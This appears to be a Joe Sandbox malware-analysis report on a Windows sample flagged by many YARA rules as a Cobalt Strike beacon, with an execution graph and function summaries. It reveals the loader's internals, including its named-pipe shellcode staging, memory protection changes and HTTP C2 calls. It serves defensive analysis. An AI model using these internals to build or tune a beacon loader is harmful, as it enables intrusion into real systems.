                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.9%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:11.3%
                    Total number of Nodes:319
                    Total number of Limit Nodes:19
                    execution_graph 37291 4014c0 37296 401990 37291->37296 37293 4014d6 37300 401180 37293->37300 37295 4014db 37297 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 37296->37297 37298 4019b9 37296->37298 37299 401a2b 37297->37299 37298->37293 37299->37293 37301 401460 GetStartupInfoA 37300->37301 37302 4011b4 37300->37302 37308 4013b4 37301->37308 37303 4011e1 Sleep 37302->37303 37304 4011f6 37302->37304 37303->37302 37305 401229 37304->37305 37306 40142c _initterm 37304->37306 37304->37308 37318 401fd0 37305->37318 37306->37305 37308->37295 37309 401251 SetUnhandledExceptionFilter 37338 4024e0 37309->37338 37311 40130e malloc 37313 401335 37311->37313 37314 40137b 37311->37314 37312 40126d 37312->37311 37315 401340 strlen malloc memcpy 37313->37315 37344 403040 37314->37344 37315->37315 37316 401376 37315->37316 37316->37314 37323 402008 37318->37323 37337 401ff2 37318->37337 37319 402240 37321 40223a 37319->37321 37319->37337 37320 4021ce 37325 40228c 37320->37325 37349 401dc0 8 API calls 37320->37349 37321->37319 37321->37325 37351 401dc0 8 API calls 37321->37351 37322 4022a8 37353 401d50 8 API calls 37322->37353 37323->37319 37323->37320 37323->37322 37331 4020b0 37323->37331 37323->37337 37352 401d50 8 API calls 37325->37352 37327 402208 37350 401dc0 8 API calls 37327->37350 37330 4022b4 37330->37309 37331->37320 37331->37325 37331->37327 37333 401dc0 8 API calls 37331->37333 37334 402156 37331->37334 37335 402160 37331->37335 37333->37331 37334->37335 37336 402192 VirtualProtect 37335->37336 37335->37337 37336->37335 37337->37309 37340 4024ef 37338->37340 37339 40251c 37339->37312 37340->37339 37354 402a80 strncmp 37340->37354 37342 402517 37342->37339 37343 4025c5 RtlAddFunctionTable 37342->37343 37343->37339 37345 40304a 37344->37345 37355 4017f8 GetTickCount 37345->37355 37348 403058 SleepEx 37348->37348 37349->37327 37350->37321 37351->37321 37352->37322 37353->37330 37354->37342 37356 402e28 37355->37356 37357 401866 CreateThread 37356->37357 37358 4017a6 malloc 37357->37358 37373 4016e6 37357->37373 37359 4017c8 SleepEx 37358->37359 37365 401704 CreateFileA 37359->37365 37362 4017de 37370 401595 VirtualAlloc 37362->37370 37364 4017ed 37364->37348 37366 40179c 37365->37366 37367 40175e 37365->37367 37366->37359 37366->37362 37368 401781 CloseHandle 37367->37368 37369 401762 ReadFile 37367->37369 37368->37366 37369->37367 37369->37368 37371 4015c7 37370->37371 37372 4015e8 VirtualProtect CreateThread 37371->37372 37372->37364 37376 401630 CreateNamedPipeA 37373->37376 37377 4016dc 37376->37377 37378 40168f ConnectNamedPipe 37376->37378 37378->37377 37379 4016a3 37378->37379 37380 4016c6 CloseHandle 37379->37380 37381 4016a7 WriteFile 37379->37381 37380->37377 37381->37380 37382 4016d1 37381->37382 37382->37379 37383 681b48 37384 681b64 37383->37384 37386 681b69 37383->37386 37397 6892d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 37384->37397 37387 681bf4 37386->37387 37395 681bbe 37386->37395 37398 6819e8 118 API calls 15 library calls 37386->37398 37387->37395 37399 6793e0 37387->37399 37389 681c12 37390 681c3b 37389->37390 37392 6793e0 _DllMainCRTStartup 205 API calls 37389->37392 37390->37395 37415 6819e8 118 API calls 15 library calls 37390->37415 37394 681c2e 37392->37394 37414 6819e8 118 API calls 15 library calls 37394->37414 37397->37386 37398->37387 37400 6794bb 37399->37400 37403 679402 _DllMainCRTStartup 37399->37403 37483 67b47c 37400->37483 37402 679407 _DllMainCRTStartup 37402->37389 37403->37402 37413 679465 _DllMainCRTStartup 37403->37413 37500 67d4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 37403->37500 37406 679448 37407 679457 37406->37407 37408 67949f 37406->37408 37406->37413 37407->37413 37501 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37407->37501 37408->37413 37503 67d134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 37408->37503 37411 679487 37411->37413 37502 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37411->37502 37416 66ca74 37413->37416 37414->37390 37415->37395 37504 675fec 37416->37504 37418 66ca92 _DllMainCRTStartup 37511 67f284 37418->37511 37420 66cb40 _DllMainCRTStartup 37528 67c230 37420->37528 37426 66cbb5 37427 67eaa8 _DllMainCRTStartup 41 API calls 37426->37427 37428 66cbcf 37427->37428 37553 66f3c0 37428->37553 37431 66cbd8 37615 67da74 20 API calls 2 library calls 37431->37615 37433 66cbdd _DllMainCRTStartup 37434 66cbf4 37433->37434 37435 66cbf9 37433->37435 37616 67da74 20 API calls 2 library calls 37434->37616 37558 66f1f8 37435->37558 37439 66cc0e 37564 66f274 37439->37564 37440 66cc09 37617 67da74 20 API calls 2 library calls 37440->37617 37444 66cc17 37618 67da74 20 API calls 2 library calls 37444->37618 37446 66cc1c _DllMainCRTStartup 37447 67f284 malloc 38 API calls 37446->37447 37448 66cc4f 37447->37448 37449 66cc57 37448->37449 37450 66cc5c _DllMainCRTStartup 37448->37450 37619 67da74 20 API calls 2 library calls 37449->37619 37452 67eaa8 _DllMainCRTStartup 41 API calls 37450->37452 37453 66cc78 _DllMainCRTStartup 37452->37453 37576 675c60 GetACP 37453->37576 37484 675fec _DllMainCRTStartup 38 API calls 37483->37484 37485 67b4a0 _vsnprintf_helper _DllMainCRTStartup 37484->37485 37486 67f284 malloc 38 API calls 37485->37486 37487 67b52d _vsnprintf_helper 37486->37487 37488 67eaa8 _DllMainCRTStartup 41 API calls 37487->37488 37489 67b55e _DllMainCRTStartup 37488->37489 37491 67b575 _DllMainCRTStartup 37489->37491 37745 66f014 37489->37745 37492 67b611 GetComputerNameA 37491->37492 37495 67b634 GetPdbDllFromInstallPath _DllMainCRTStartup 37491->37495 37749 67baa8 _DllMainCRTStartup 37492->37749 37497 67f284 malloc 38 API calls 37495->37497 37498 67b802 37495->37498 37499 67eaa8 _DllMainCRTStartup 41 API calls 37495->37499 37497->37495 37750 6760e0 8 API calls 2 library calls 37498->37750 37499->37495 37500->37406 37501->37411 37502->37413 37503->37413 37505 67f284 malloc 38 API calls 37504->37505 37506 67600d 37505->37506 37507 67f284 malloc 38 API calls 37506->37507 37510 676015 _vsnprintf_helper _DllMainCRTStartup 37506->37510 37508 676021 37507->37508 37508->37510 37620 67f244 37508->37620 37510->37418 37512 67f29c 37511->37512 37513 67f318 37511->37513 37515 67f2d4 HeapAlloc 37512->37515 37516 67f2b4 37512->37516 37521 67f2fd 37512->37521 37525 67f302 37512->37525 37630 681db4 DecodePointer 37512->37630 37633 681db4 DecodePointer 37513->37633 37515->37512 37520 67f30d 37515->37520 37516->37515 37627 681df0 34 API calls 2 library calls 37516->37627 37628 681e64 34 API calls 7 library calls 37516->37628 37629 67ff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 37516->37629 37517 67f31d 37634 681d18 8 API calls _getptd_noexit 37517->37634 37520->37420 37631 681d18 8 API calls _getptd_noexit 37521->37631 37632 681d18 8 API calls _getptd_noexit 37525->37632 37635 68145c GetSystemTimeAsFileTime 37528->37635 37533 67f284 malloc 38 API calls 37535 67c2a1 _vsnprintf_helper GetPdbDllFromInstallPath 37533->37535 37536 67c30a 37535->37536 37640 68181c 37535->37640 37537 68181c strtok 47 API calls 37536->37537 37538 66cb87 37537->37538 37539 6734a0 37538->37539 37540 68145c _time64 GetSystemTimeAsFileTime 37539->37540 37541 6734b3 37540->37541 37542 68044c _DllMainCRTStartup 44 API calls 37541->37542 37543 6734bb _DllMainCRTStartup 37542->37543 37682 672f5c 37543->37682 37546 67eaa8 37547 67eae7 37546->37547 37548 67eafd _vsnprintf_helper 37546->37548 37549 67eaf3 37547->37549 37550 67eaff 37547->37550 37548->37426 37551 67f284 malloc 38 API calls 37549->37551 37687 681914 41 API calls 5 library calls 37550->37687 37551->37548 37554 66f3d4 _DllMainCRTStartup 37553->37554 37555 66cbd4 37554->37555 37556 66f3da GetLocalTime 37554->37556 37555->37431 37555->37433 37557 66f408 _DllMainCRTStartup 37556->37557 37557->37555 37560 66f20e _DllMainCRTStartup 37558->37560 37559 66cc05 37559->37439 37559->37440 37560->37559 37560->37560 37688 67a8dc 63 API calls _DllMainCRTStartup 37560->37688 37562 66f248 37689 67a914 62 API calls 3 library calls 37562->37689 37566 66f299 _DllMainCRTStartup 37564->37566 37565 66cc13 37565->37444 37565->37446 37566->37565 37567 66f2eb htonl htonl 37566->37567 37567->37565 37568 66f30b 37567->37568 37569 67f284 malloc 38 API calls 37568->37569 37570 66f315 GetPdbDllFromInstallPath _DllMainCRTStartup 37569->37570 37571 66f36b _vsnprintf_helper 37570->37571 37690 67a8dc 63 API calls _DllMainCRTStartup 37570->37690 37575 67f244 free 8 API calls 37571->37575 37573 66f34c 37691 67a914 62 API calls 3 library calls 37573->37691 37575->37565 37577 675c88 getSystemCP 37576->37577 37692 661218 37577->37692 37581 675ca8 __security_init_cookie 37582 675cae GetTickCount 37581->37582 37583 68044c _DllMainCRTStartup 44 API calls 37582->37583 37584 675cbf 37583->37584 37698 66cfa4 CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 37584->37698 37586 675cc4 _DllMainCRTStartup 37587 675cfe 37586->37587 37588 675cec GetCurrentProcess 37586->37588 37699 67dec8 CheckTokenMembership FreeSid _DllMainCRTStartup 37587->37699 37735 670c64 GetModuleHandleA GetProcAddress 37588->37735 37590 675cfa 37590->37587 37592 675d06 37700 66e2a8 htonl htonl 37592->37700 37594 675d1c 37701 66e200 htonl GetPdbDllFromInstallPath 37594->37701 37596 675d2f 37702 66e200 htonl GetPdbDllFromInstallPath 37596->37702 37598 675d3f 37703 66e200 htonl GetPdbDllFromInstallPath 37598->37703 37600 675d4f 37704 66e248 htonl htonl _DllMainCRTStartup 37600->37704 37602 675d5e __security_init_cookie 37705 66e248 htonl htonl _DllMainCRTStartup 37602->37705 37604 675d6f 37706 66e278 htonl _DllMainCRTStartup 37604->37706 37606 675d7a 37707 66e1e0 htonl _DllMainCRTStartup 37606->37707 37608 675d85 37708 675e28 37608->37708 37621 67f249 HeapFree 37620->37621 37625 67f279 realloc 37620->37625 37622 67f264 37621->37622 37621->37625 37626 681d18 8 API calls _getptd_noexit 37622->37626 37624 67f269 GetLastError 37624->37625 37625->37510 37626->37624 37627->37516 37628->37516 37630->37512 37631->37525 37632->37520 37633->37517 37634->37520 37636 67c259 37635->37636 37637 68044c 37636->37637 37649 685844 37637->37649 37641 685844 _getptd 44 API calls 37640->37641 37642 681840 37641->37642 37643 68190e 37642->37643 37646 681861 37642->37646 37679 688c50 RtlCaptureContext RtlLookupFunctionEntry UnhandledExceptionFilter IsProcessorFeaturePresent __report_securityfailure 37643->37679 37645 681913 37670 687e20 37646->37670 37654 685868 GetLastError 37649->37654 37651 68584f 37652 67c261 37651->37652 37666 6800b4 44 API calls 3 library calls 37651->37666 37652->37533 37667 6840a8 37654->37667 37656 685885 37657 684728 _calloc_crt 6 API calls 37656->37657 37658 6858d2 _getptd_noexit 37656->37658 37659 68589a 37657->37659 37658->37651 37659->37658 37660 6840c4 _CRT_INIT TlsSetValue 37659->37660 37661 6858b0 37660->37661 37662 6858cd 37661->37662 37663 6858b7 _initptd 37661->37663 37664 67f244 free 6 API calls 37662->37664 37665 6858be GetCurrentThreadId 37663->37665 37664->37658 37665->37658 37668 6840b8 37667->37668 37669 6840bb TlsGetValue 37667->37669 37668->37669 37671 687e29 37670->37671 37672 681903 37671->37672 37673 688b7c IsProcessorFeaturePresent 37671->37673 37672->37535 37674 688b93 37673->37674 37680 683ffc RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 37674->37680 37676 688ba6 37681 688b30 UnhandledExceptionFilter __crtUnhandledException _call_reportfault 37676->37681 37679->37645 37680->37676 37683 66cb94 37682->37683 37686 672f87 _DllMainCRTStartup 37682->37686 37683->37546 37684 67f284 malloc 38 API calls 37684->37686 37685 67eaa8 _DllMainCRTStartup 41 API calls 37685->37686 37686->37683 37686->37684 37686->37685 37687->37548 37688->37562 37689->37559 37690->37573 37691->37571 37738 661184 CryptAcquireContextA 37692->37738 37695 661245 37697 67b0b4 38 API calls _DllMainCRTStartup 37695->37697 37697->37581 37698->37586 37699->37592 37700->37594 37701->37596 37702->37598 37703->37600 37704->37602 37705->37604 37706->37606 37707->37608 37709 675fec _DllMainCRTStartup 38 API calls 37708->37709 37710 675e51 _DllMainCRTStartup 37709->37710 37711 675eb5 GetComputerNameA 37710->37711 37744 66f008 37711->37744 37735->37590 37739 6611c2 CryptAcquireContextA 37738->37739 37740 6611e6 _DllMainCRTStartup 37738->37740 37739->37740 37741 66120c 37739->37741 37742 6611fd CryptReleaseContext 37740->37742 37741->37695 37743 6610d0 GetSystemTimeAsFileTime clock 37741->37743 37742->37741 37743->37695 37746 66f02f _DllMainCRTStartup 37745->37746 37747 66f058 WSAIoctl 37746->37747 37748 66f051 _DllMainCRTStartup 37746->37748 37747->37748 37748->37491 37749->37495 37751 689cec 37752 689d01 37751->37752 37757 689d1e 37751->37757 37753 689d0f 37752->37753 37752->37757 37759 681d18 8 API calls _getptd_noexit 37753->37759 37754 689d36 HeapAlloc 37756 689d14 37754->37756 37754->37757 37757->37754 37757->37756 37760 681db4 DecodePointer 37757->37760 37759->37756 37760->37757 37761 1b88d4 37762 1b8961 37761->37762 37767 1b9324 37762->37767 37764 1b8a01 37771 1b96b4 37764->37771 37766 1b8a8f 37770 1b935e 37767->37770 37768 1b9479 37768->37764 37769 1b9455 VirtualAlloc 37769->37768 37770->37768 37770->37769 37774 1b9723 37771->37774 37772 1b994f 37772->37766 37773 1b976e LoadLibraryA 37773->37774 37774->37772 37774->37773

                    Executed Functions

                    Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196sleepstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 14 401470-40148a call 402e88 11->14 13 4011e9-4011f4 12->13 15 4011f6-401204 13->15 16 4011d8-4011db 13->16 20 401417-401426 call 402e90 15->20 21 40120a-40120e 15->21 18 401400-401411 16->18 19 4011e1-4011e6 Sleep 16->19 18->20 18->21 19->13 28 401229-40122b 20->28 29 40142c-401447 _initterm 20->29 24 401490-4014a9 call 402e80 21->24 25 401214-401223 21->25 36 4014ae-4014b6 call 402e60 24->36 25->28 25->29 31 401231-40123e 28->31 32 40144d-401452 28->32 29->31 29->32 33 401240-401248 31->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 31->34 32->31 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 50 4012a0-4012a2 48->50 51 4012ba-4012c8 48->51 52 4012f0-4012f6 49->52 56 4012a4-4012a7 50->56 57 4012e9 50->57 53 4012ae 51->53 54 4012f8-401302 52->54 55 40130e-401333 malloc 52->55 53->48 60 4013f0-4013f5 54->60 61 401308 54->61 62 401335-40133a 55->62 63 40137b-4013af call 401950 call 403040 55->63 58 4012d0-4012d2 56->58 59 4012a9 56->59 57->52 58->57 65 4012d4 58->65 59->53 60->61 61->55 66 401340-401374 strlen malloc memcpy 62->66 72 4013b4-4013c2 63->72 68 4012d8-4012e2 65->68 66->66 69 401376 66->69 68->57 71 4012e4-4012e7 68->71 69->63 71->57 71->68 72->36 73 4013c8-4013d0 72->73 73->14 74 4013d6-4013e5 73->74
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                    • String ID: 0PE$@6E$DCE
                    • API String ID: 649803965-2430247936
                    • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                    • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                    • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                    • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348
                    Function 0066E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • _snprintf.LIBCMT ref: 0066E725
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                      • Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5
                    • _snprintf.LIBCMT ref: 0066E7BD
                    • _snprintf.LIBCMT ref: 0066E7D4
                    • HttpOpenRequestA.WININET ref: 0066E818
                    • HttpSendRequestA.WININET ref: 0066E84A
                    • InternetQueryDataAvailable.WININET ref: 0066E87A
                    • InternetCloseHandle.WININET ref: 0066E898
                      • Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
                      • Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C
                      • Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
                      • Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3
                    • InternetReadFile.WININET ref: 0066E8D4
                    • InternetCloseHandle.WININET ref: 0066E8F5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                    • String ID: %s%s$*/*
                    • API String ID: 3536628738-856325523
                    • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                    • Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
                    • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                    • Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700
                    Function 00675E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                    • String ID: %s%s%s
                    • API String ID: 1671524875-1891519693
                    • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                    • Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
                    • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                    • Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748
                    Function 00661184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 182 661184-6611c0 CryptAcquireContextA 183 6611e6-6611f9 call 692020 182->183 184 6611c2-6611e4 CryptAcquireContextA 182->184 188 6611fd-66120a CryptReleaseContext 183->188 189 6611fb 183->189 184->183 186 66120c-661216 184->186 188->186 189->188
                    APIs
                    • CryptAcquireContextA.ADVAPI32 ref: 006611B8
                    • CryptAcquireContextA.ADVAPI32 ref: 006611DC
                    • CryptGenRandom.ADVAPI32 ref: 006611F0
                    • CryptReleaseContext.ADVAPI32 ref: 00661204
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$Acquire$RandomRelease
                    • String ID: ($Microsoft Base Cryptographic Provider v1.0
                    • API String ID: 685801729-4046902070
                    • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                    • Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
                    • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                    • Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740
                    Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50pipefileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 399 401630-40168d CreateNamedPipeA 400 4016dc-4016e5 399->400 401 40168f-4016a1 ConnectNamedPipe 399->401 401->400 402 4016a3-4016a5 401->402 403 4016c6-4016cf CloseHandle 402->403 404 4016a7-4016c4 WriteFile 402->404 403->400 404->403 405 4016d1-4016da 404->405 405->402
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                    • String ID:
                    • API String ID: 2239253087-0
                    • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                    • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                    • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                    • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08
                    Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • malloc.MSVCRT ref: 004017B9
                    • SleepEx.KERNELBASE ref: 004017CD
                      • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                      • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                      • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                    • GetTickCount.KERNEL32 ref: 004017FC
                    • CreateThread.KERNEL32 ref: 00401885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                    • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                    • API String ID: 3660650057-1020837823
                    • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                    • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
